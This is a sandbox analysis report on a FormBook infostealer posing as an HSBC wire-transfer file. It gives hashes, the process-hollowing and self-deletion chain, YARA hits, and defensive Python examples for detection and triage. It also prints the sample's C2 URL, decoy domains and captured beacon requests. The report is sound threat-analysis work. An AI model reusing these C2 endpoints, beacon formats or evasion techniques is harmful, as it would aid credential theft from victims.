
Windows Analysis Report: HSBC ... Wire Transfer Copy.exe

Overview

General Information

Sample Name: HSBC ... Wire Transfer Copy.exe
Analysis ID: 528773
MD5: 99b154970d15748d1df9025f675ecc76
SHA1: 75503611daf18643a401c2020ae9e045111b7f1f
SHA256: 13af03cd2db9c68bc397fd81f101287df005f27bc806737ffad390324a068d4c
Tags: exe, Formbook, HSBC

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • HSBC ... Wire Transfer Copy.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe" MD5: 99B154970D15748D1DF9025F675ECC76)
    • HSBC ... Wire Transfer Copy.exe (PID: 7164 cmdline: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe MD5: 99B154970D15748D1DF9025F675ECC76)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6536 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6672 cmdline: /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
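The chain above (sample spawns a copy of itself, the payload ends up in explorer.exe, explorer.exe starts a SysWOW64 utility, and that utility runs cmd /c del on the original file) is the part of this report a detection engineer can turn into rules without any FormBook-specific bytes. The following is an added example, not part of the Joe Sandbox report: it runs three behavioural rules over constructed process-creation and network-connect events that mirror the report's tree. PIDs and command lines are taken from the tree; the parent of the first process, the image path of cmd.exe, the event schema and the rule names are assumptions of this example.

```python
"""Behavioural triage over process-creation and network events.

Added example; not part of the Joe Sandbox report. EVENTS is constructed
to mirror the report's process tree. PIDs and command lines come from the
tree; the root parent PID (4242), cmd.exe's image path and the event
schema itself are assumptions, not report data.
"""
import re
from typing import Dict, List

SAMPLE = r"C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"

# kind: "proc" = process creation, "net" = outbound connection
EVENTS: List[Dict] = [
    {"kind": "proc", "pid": 6892, "ppid": 4242, "image": SAMPLE, "cmdline": f'"{SAMPLE}"'},
    {"kind": "proc", "pid": 7164, "ppid": 6892, "image": SAMPLE, "cmdline": SAMPLE},
    {"kind": "proc", "pid": 3352, "ppid": 4242, "image": r"C:\Windows\Explorer.EXE",
     "cmdline": r"C:\Windows\Explorer.EXE"},
    {"kind": "net", "pid": 3352, "image": r"C:\Windows\explorer.exe",
     "dst": "34.102.136.180", "dport": 80},
    {"kind": "proc", "pid": 6536, "ppid": 3352, "image": r"C:\Windows\SysWOW64\ipconfig.exe",
     "cmdline": r"C:\Windows\SysWOW64\ipconfig.exe"},
    {"kind": "proc", "pid": 6672, "ppid": 6536, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": f'/c del "{SAMPLE}"'},
    {"kind": "proc", "pid": 6888, "ppid": 6672, "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

# Utilities that never legitimately spawn children (assumed list; extend as needed).
LEAF_UTILITIES = {"ipconfig.exe"}
# The user shell; outbound connections from it are the report's "system process connects to network".
SHELL_PROCESSES = {"explorer.exe"}


def base(path: str) -> str:
    """Lower-cased image basename."""
    return path.rsplit("\\", 1)[-1].lower()


def lineage(pid: int, procs: Dict[int, Dict]) -> List[str]:
    """Image basenames from pid upwards, stopping at the first parent missing from the log."""
    chain = []
    while pid in procs:
        chain.append(base(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return chain


def detect(events: List[Dict]) -> List[Dict]:
    """Return one finding per rule hit; each finding names the rule and the PID involved."""
    procs = {e["pid"]: e for e in events if e["kind"] == "proc"}
    findings: List[Dict] = []
    for e in events:
        if e["kind"] == "net":
            if base(e["image"]) in SHELL_PROCESSES:
                findings.append({"rule": "shell_network_connect", "pid": e["pid"],
                                 "dst": f'{e["dst"]}:{e["dport"]}'})
            continue
        parent = procs.get(e["ppid"])
        # Rule 1: a process starting a second copy of its own image (the hollowing setup).
        if parent and parent["image"].lower() == e["image"].lower():
            findings.append({"rule": "self_spawn", "pid": e["pid"], "image": e["image"]})
        # Rule 2: a leaf utility such as ipconfig.exe has no business creating children.
        if parent and base(parent["image"]) in LEAF_UTILITIES:
            findings.append({"rule": "leaf_utility_spawned_child", "pid": e["pid"],
                             "parent": base(parent["image"])})
        # Rule 3: cmd.exe deleting an executable, reported with its full ancestry.
        m = re.search(r'\bdel\s+"?([^"]+?\.exe)"?', e["cmdline"], re.IGNORECASE)
        if base(e["image"]) == "cmd.exe" and m:
            findings.append({"rule": "cmd_self_delete", "pid": e["pid"],
                             "target": m.group(1), "lineage": lineage(e["pid"], procs)})
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

The lineage on the self-delete finding is what makes the alert readable: cmd.exe under ipconfig.exe under explorer.exe is not a chain a user produces. Creation-in-suspended-mode and the APC/thread-context injection the report lists are API-level facts that process-creation telemetry alone does not carry; those need the sandbox or an EDR hooking layer.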

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.atlantiscompania.com/m4n8/"], "decoy": ["loganvineyard.com", "seanna-charters.com", "ironbandfitness.com", "centuriesandsleuthsreviews.com", "saminicky2022.com", "oscarlorenzo.online", "donaldlittlelaw.com", "internetbook.net", "dailyhealthyfood.com", "kostarelosdair.com", "baodingtangyang.com", "cumberlndfarms.com", "dylanmellor.xyz", "investwithelsa.com", "dermaaesthetika.com", "shoelife864.com", "nightcosex.biz", "greauxbooks.com", "artwithnumber.com", "hyggestudio.store", "vektor-pro.com", "bookextraevents.com", "poweredsky.store", "carver150.com", "greenfleetshippingco.com", "raise-ryokwpl.xyz", "lobbiru.com", "tilcep.xyz", "frist-universe.com", "thehumanityleague.com", "zz4321.com", "rightpowereletricalservices.com", "alainasdesigns.com", "getcardanocoin.com", "wattnow.biz", "nitromaxfmx.com", "rty161578.top", "danielthan.com", "devjmccormick.com", "clearwaterwaverunners.com", "onlineames.com", "pureproducts.xyz", "yoothdirect.info", "tryprovo.com", "mkuu88888.xyz", "fibers2you.com", "urdnauha.xyz", "andfme.com", "shopkoman.com", "civico46bcn.com", "top-online-fashion-24.com", "lakshimechatronicssystems.com", "cortezphoto.com", "samallondemolitonyorkshire.com", "uang.exchange", "gonderipaylasim.net", "piramsgprodiet.store", "parasmountplus.com", "sifangav.net", "gramaltinrafineri.com", "kvb5676.com", "atomhome.xyz", "catproductreviews.com", "frenchieaday.com"]}

Yara Overview

Memory Dumps

Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook (Yara detected FormBook; author: Joe Security)
  Rule: Formbook_1 (autogenerated rule brought to you by yara-signator; author: Felix Bilstein - yara-signator at cocacoding dot com)
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook (detect Formbook in memory; author: JPCERT/CC Incident Response Group)
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp
  Rule: JoeSecurity_FormBook (Yara detected FormBook; author: Joe Security)
  Rule: Formbook_1 (autogenerated rule brought to you by yara-signator; author: Felix Bilstein - yara-signator at cocacoding dot com)
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(2 of 31 matching memory dumps shown)

Unpacked PEs

Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook (Yara detected FormBook; author: Joe Security)
  Rule: Formbook_1 (autogenerated rule brought to you by yara-signator; author: Felix Bilstein - yara-signator at cocacoding dot com)
    • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook (detect Formbook in memory; author: JPCERT/CC Incident Response Group)
    • 0x17a49:$sqlite3step: 68 34 1C 7B E1
    • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
    • 0x17a78:$sqlite3text: 68 38 2A 90 C5
    • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
    • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack
  Rule: JoeSecurity_FormBook (Yara detected FormBook; author: Joe Security)
  Rule: Formbook_1 (autogenerated rule brought to you by yara-signator; author: Felix Bilstein - yara-signator at cocacoding dot com)
    • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(2 of 18 matching unpacked PEs shown)
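Two things in the Yara tables are worth checking by hand rather than taking on trust. First, every string hit in the .unpack files sits exactly 0xE00 below the same hit in the memory dump (0x8b08 vs 0x9908, 0x148b5 vs 0x156b5, 0x17a49 vs 0x18849), which is what a constant raw-versus-virtual section offset looks like, i.e. both are the same payload. Second, $sequence_0 (03 C8 0F 31 2B C1 89 45 FC) disassembles to add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax, the RDTSC timing check behind the report's "detect virtualization through RDTSC time measurements" signature. The block below is an added example (not part of the report and not the rule authors' code) that re-scans a constructed buffer for the report's hex strings and verifies the constant shift; pointing it at a real .sdmp or .unpack file only needs the buffer read from disk. The label "hashed API names" for the JPCERT push constants is this example's assumption; the report only gives the rule's string names.

```python
"""Re-checking the report's YARA string hits with a plain byte scan.

Added example; not part of the Joe Sandbox report and not the rule
authors' code. PATTERNS are the hex strings the report lists for the
Formbook_1 (yara-signator) and Formbook (JPCERT/CC) rules. The scanned
buffer is constructed here with those strings planted at the offsets
the report gives for memory dump 00000006.00000000.287427300...sdmp.
"""
from typing import Dict, List, Optional

PATTERNS: Dict[str, bytes] = {
    # add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax: an RDTSC timing check
    "Formbook_1:$sequence_0": bytes.fromhex("03 C8 0F 31 2B C1 89 45 FC"),
    "Formbook_1:$sequence_1": bytes.fromhex("3C 24 0F 84 76 FF FF FF 3C 25 74 94"),
    "Formbook_1:$sequence_7": bytes.fromhex("66 89 0C 02 5B 8B E5 5D"),
    # push imm32 constants the JPCERT rule names after sqlite3 functions
    # (assumed here to be hashed API names; the report does not say)
    "Formbook:$sqlite3step": bytes.fromhex("68 34 1C 7B E1"),
    "Formbook:$sqlite3text": bytes.fromhex("68 38 2A 90 C5"),
    "Formbook:$sqlite3blob": bytes.fromhex("68 53 D8 7F 8C"),
}

# Offsets the report gives for these strings in the memory dump.
REPORTED_DUMP_OFFSETS: Dict[str, List[int]] = {
    "Formbook_1:$sequence_0": [0x9908, 0x9B82],
    "Formbook_1:$sequence_1": [0x156B5],
    "Formbook_1:$sequence_7": [0xB293],
    "Formbook:$sqlite3step": [0x18849, 0x1895C],
    "Formbook:$sqlite3text": [0x18878, 0x1899D],
    "Formbook:$sqlite3blob": [0x1888B, 0x189B3],
}


def build_buffer(shift: int = 0, size: int = 0x20000) -> bytes:
    """Constructed stand-in for a dump: zero filler with every pattern
    written at its reported offset plus `shift` (negative shift models
    the .unpack file, whose offsets are 0xE00 lower)."""
    buf = bytearray(size)
    for name, offsets in REPORTED_DUMP_OFFSETS.items():
        for off in offsets:
            pat = PATTERNS[name]
            buf[off + shift: off + shift + len(pat)] = pat
    return bytes(buf)


def scan(buf: bytes, patterns: Dict[str, bytes] = PATTERNS) -> Dict[str, List[int]]:
    """All offsets of each pattern, in ascending order, like YARA's per-string match list."""
    hits: Dict[str, List[int]] = {}
    for name, pat in patterns.items():
        found: List[int] = []
        pos = buf.find(pat)
        while pos != -1:
            found.append(pos)
            pos = buf.find(pat, pos + 1)
        if found:
            hits[name] = found
    return hits


def constant_shift(a: Dict[str, List[int]], b: Dict[str, List[int]]) -> Optional[int]:
    """If every string shared by two hit sets is displaced by one constant
    distance, return it; otherwise None. A constant answer means the two
    artefacts hold the same code at different base offsets."""
    deltas = {x - y for k in a.keys() & b.keys() for x, y in zip(a[k], b[k])}
    return deltas.pop() if len(deltas) == 1 else None


if __name__ == "__main__":
    dump_hits = scan(build_buffer())
    unpack_hits = scan(build_buffer(-0xE00))
    for name, offs in dump_hits.items():
        print(name, [hex(o) for o in offs])
    print("constant shift dump -> unpack:", hex(constant_shift(dump_hits, unpack_hits)))
```

A plain substring scan is enough here because these rule strings are fixed byte sequences with no wildcards; for the real rules, run yara itself. The value of the check is the shift test: when a triage tool reports the same payload twice under different names, identical strings at a constant distance is a quick way to confirm it is one payload and not two.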

Sigma Overview

No Sigma rule has matched

          Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook (the full C2 list and decoy list are reproduced under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: HSBC ... Wire Transfer Copy.exe, Virustotal: Detection: 16%
Source: HSBC ... Wire Transfer Copy.exe, ReversingLabs: Detection: 40%
Yara detected FormBook
Source: Yara match, file source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match, file source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match, file source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match, file source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Uses 32bit PE files
Source: HSBC ... Wire Transfer Copy.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: HSBC ... Wire Transfer Copy.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ipconfig.pdb, source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
Source: Binary string: ipconfig.pdbGCTL, source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP, source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp; HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp; ipconfig.exe, 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp; ipconfig.exe, 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb, source: HSBC ... Wire Transfer Copy.exe (same two regions as above); ipconfig.exe (same two regions as above)
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe, Code function: 4x nop then pop edi, at 6_2_0040E477
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 4x nop then pop edi, at 16_2_02C6E477

Two of these findings tie the hollowing together: the ipconfig.pdb path is found inside the sample's own memory (region 0x1990000 of process 6), which is consistent with the sample mapping the ipconfig.exe image before injecting into a new ipconfig.exe process, and the same nop-then-pop-edi function sits at 0x0040E477 in the sample and 0x02C6E477 in ipconfig.exe, i.e. the same payload code at two different bases. The wntdll.pdb strings in both processes likewise point to a second, manually mapped copy of ntdll, which is the usual companion of the "modifies the prolog of user mode functions" finding.

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Network Connect: 172.217.168.83 80
Source: C:\Windows\explorer.exe, Domain query: www.gramaltinrafineri.com
Source: C:\Windows\explorer.exe, Domain query: www.catproductreviews.com
Source: C:\Windows\explorer.exe, Domain query: www.piramsgprodiet.store
Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.atlantiscompania.com/m4n8/
Source: global traffic, HTTP traffic detected (request; no User-Agent header):
  GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+ HTTP/1.1
  Host: www.piramsgprodiet.store
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 (7 NUL bytes; nothing printable)
Source: global traffic, HTTP traffic detected (request; no User-Agent header):
  GET /m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPo HTTP/1.1
  Host: www.gramaltinrafineri.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected (request; no User-Agent header):
  GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb6 HTTP/1.1
  Host: www.catproductreviews.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected (response):
  HTTP/1.1 403 Forbidden
  Server: openresty
  Date: Thu, 25 Nov 2021 17:58:23 GMT
  Content-Type: text/html
  Content-Length: 275
  ETag: "61973ffe-113"
  Via: 1.1 google
  Connection: close
  Body (ASCII decoded from the raw hex): <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic, HTTP traffic detected (response): a second, byte-identical 403 Forbidden response (same Server, Content-Length, ETag, Via and body) with Date: Thu, 25 Nov 2021 17:58:43 GMT
Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp; HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name (a .NET claims-namespace URI, consistent with the .NET loader stage noted under Signatures)
Source: ipconfig.exe, 00000010.00000002.551598331.000000000403F000.00000004.00020000.sdmp, String found in binary or memory: https://www.piramsgprodiet.store/m4n8/?l0G=-Zrd9J1pqHLdHPo&amp;5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNH
Source: unknown, DNS traffic detected: queries for: www.piramsgprodiet.store

Note on the capture: all three beacons went to hosts taken from the configuration's decoy list, and no request to the configured C2 host www.atlantiscompania.com appears. The same /m4n8/ path and the same l0G=-Zrd9J1pqHLdHPo parameter were sent to every host while the 5jblCF value changed each time, so the path and the parameter shape, not the host name, are the durable network indicators for this sample. Both recorded responses are 403 Forbidden from an openresty server behind a "Via: 1.1 google" proxy, so no C2 exchange completed during the run.
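Putting the captured requests next to the extracted configuration makes the decoy behaviour concrete: each request host is looked up in the C2 list and the decoy list, the URI path is compared with the path configured for the real C2, and the query parameters are diffed across beacons to find the one that stays constant. The following is an added example, not part of the Joe Sandbox report. CONFIG is a subset of the report's extracted configuration, the first three REQUESTS are reconstructed from the capture above, the fourth is a constructed benign control, and the beacon-shape rule (configured path, GET, exactly two query parameters, non-empty body) is this example's reading of the capture, not a published FormBook specification.

```python
"""Classifying captured HTTP requests against an extracted FormBook config.

Added example; not part of the Joe Sandbox report. CONFIG is a subset of
the report's configuration; the first three REQUESTS are reconstructed
from the report's capture and the fourth is a constructed benign request.
The beacon rule below is this example's reading of the capture.
"""
from typing import Dict, List, Tuple

CONFIG: Dict[str, List[str]] = {
    "C2 list": ["www.atlantiscompania.com/m4n8/"],
    "decoy": ["piramsgprodiet.store", "gramaltinrafineri.com",
              "catproductreviews.com", "loganvineyard.com"],
}

# (Host header, request line, body)
REQUESTS: List[Tuple[str, str, bytes]] = [
    ("www.piramsgprodiet.store",
     "GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+ HTTP/1.1",
     b"\x00" * 7),
    ("www.gramaltinrafineri.com",
     "GET /m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPo HTTP/1.1",
     b"\x00" * 7),
    ("www.catproductreviews.com",
     "GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb6 HTTP/1.1",
     b"\x00" * 7),
    ("www.example.org", "GET /index.html HTTP/1.1", b""),  # constructed benign control
]


def norm_host(host: str) -> str:
    """Lower-case and drop a leading 'www.' so config and Host header compare equal."""
    h = host.lower()
    return h[4:] if h.startswith("www.") else h


def c2_paths(config: Dict[str, List[str]]) -> Dict[str, str]:
    """Map each configured C2 host to its URI path ('host/path' -> {host: '/path'})."""
    out: Dict[str, str] = {}
    for entry in config["C2 list"]:
        host, _, path = entry.partition("/")
        out[norm_host(host)] = "/" + path
    return out


def parse_query(query: str) -> Dict[str, str]:
    """Split a raw query string without percent- or plus-decoding, so the values
    stay byte-for-byte comparable across beacons."""
    params: Dict[str, str] = {}
    for part in query.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        params[key] = value
    return params


def classify(host: str, request_line: str, body: bytes,
             config: Dict[str, List[str]] = CONFIG) -> Dict:
    """Label one request: which list the host is on, whether the path matches the
    configured C2 path, and whether the request has the observed beacon shape."""
    method, target, _version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    params = parse_query(query)
    c2 = c2_paths(config)
    decoys = {norm_host(d) for d in config["decoy"]}
    h = norm_host(host)
    role = "c2" if h in c2 else "decoy" if h in decoys else "unknown"
    beacon = method == "GET" and path in set(c2.values()) and len(params) == 2 and len(body) > 0
    return {"host": host, "role": role, "path": path, "params": params,
            "get_with_body": method == "GET" and len(body) > 0, "beacon": beacon}


def shared_params(results: List[Dict]) -> Dict[str, str]:
    """Query parameters whose name and value are identical across every beacon;
    a constant like this is a bot-identifier candidate worth pivoting on."""
    beacons = [r["params"] for r in results if r["beacon"]]
    if not beacons:
        return {}
    common = set(beacons[0].items())
    for p in beacons[1:]:
        common &= set(p.items())
    return dict(common)


if __name__ == "__main__":
    results = [classify(*r) for r in REQUESTS]
    for r in results:
        print(r["host"], r["role"], "beacon" if r["beacon"] else "-")
    print("constant across beacons:", shared_params(results))
```

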